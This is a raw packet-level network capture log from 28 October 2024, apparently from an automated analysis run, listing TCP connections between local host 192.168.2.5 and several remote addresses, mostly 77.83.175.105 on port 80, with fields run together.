                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158381939 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158392906 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158396959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158406019 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158411980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158427000 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158437967 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158442020 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158456087 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158456087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158471107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158483028 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158488035 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158513069 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.158530951 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159046888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159061909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159076929 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159090996 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159105062 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159111977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159122944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159137011 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159138918 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159149885 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159153938 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159169912 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159181118 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159184933 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159199953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159209967 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159229040 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159254074 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159944057 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159959078 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159972906 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.159986973 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160001993 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160015106 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160017967 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160033941 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160044909 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160048962 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160059929 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160063982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160079956 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160090923 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160094023 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160110950 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160118103 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160132885 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160159111 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160917044 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160932064 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160947084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160962105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160976887 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160976887 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160991907 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.160999060 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161006927 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161021948 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161029100 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161037922 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161052942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161063910 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161067009 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161077023 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161082029 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161130905 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161925077 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161941051 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161953926 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161968946 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161986113 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.161990881 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162000895 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162010908 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162017107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162033081 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162040949 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162048101 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162054062 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162081957 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162375927 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162379026 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162405968 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162503004 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162586927 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162614107 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162682056 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162720919 CET49815443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162725925 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162753105 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162817955 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.162878036 CET49816443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.165875912 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.165899992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.165915012 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.165929079 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.165941000 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.165965080 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166337013 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166351080 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166366100 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166380882 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166397095 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166397095 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166413069 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166445971 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166546106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166560888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166575909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166604996 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166614056 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166616917 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166629076 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166645050 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166651964 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166660070 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166665077 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166677952 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166685104 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166698933 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166714907 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166901112 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166915894 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166930914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166944981 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166958094 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166960955 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166975975 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.166986942 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.167002916 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.167051077 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201364994 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201384068 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201397896 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201560974 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201560974 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201828003 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201909065 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201924086 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.201971054 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202003002 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202529907 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202544928 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202600002 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202769995 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202785969 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202826977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202840090 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202848911 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202887058 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.202987909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203002930 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203016996 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203031063 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203041077 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203061104 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203258038 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203336954 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203352928 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203391075 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203412056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.203464985 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.204185963 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.224955082 CET4434991213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.225975990 CET49912443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.226043940 CET4434991213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.226634026 CET49912443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.226646900 CET4434991213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.278645992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.278672934 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.278686047 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.278845072 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.278845072 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.278966904 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.278980970 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.278995991 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279016972 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279047012 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279176950 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279191017 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279206991 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279225111 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279267073 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279400110 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279417992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279433012 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279448986 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279464960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279480934 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279484987 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279496908 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279505968 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279525995 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279545069 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279942989 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279958010 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279972076 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.279987097 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280002117 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280016899 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280023098 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280035019 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280061960 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280330896 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280345917 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280375957 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280390978 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280405998 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280416012 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280421019 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280431986 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280452013 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280476093 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280774117 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280787945 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280802965 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280817986 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280823946 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280834913 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280843973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280850887 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280865908 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280872107 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280889034 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.280911922 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281446934 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281461954 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281476021 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281491041 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281512976 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281516075 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281528950 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281543016 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281543970 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281567097 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.281599998 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282015085 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282030106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282044888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282059908 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282075882 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282090902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282105923 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282116890 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282120943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282135963 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282140970 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282147884 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.282150984 CET804987577.83.175.105192.168.2.5
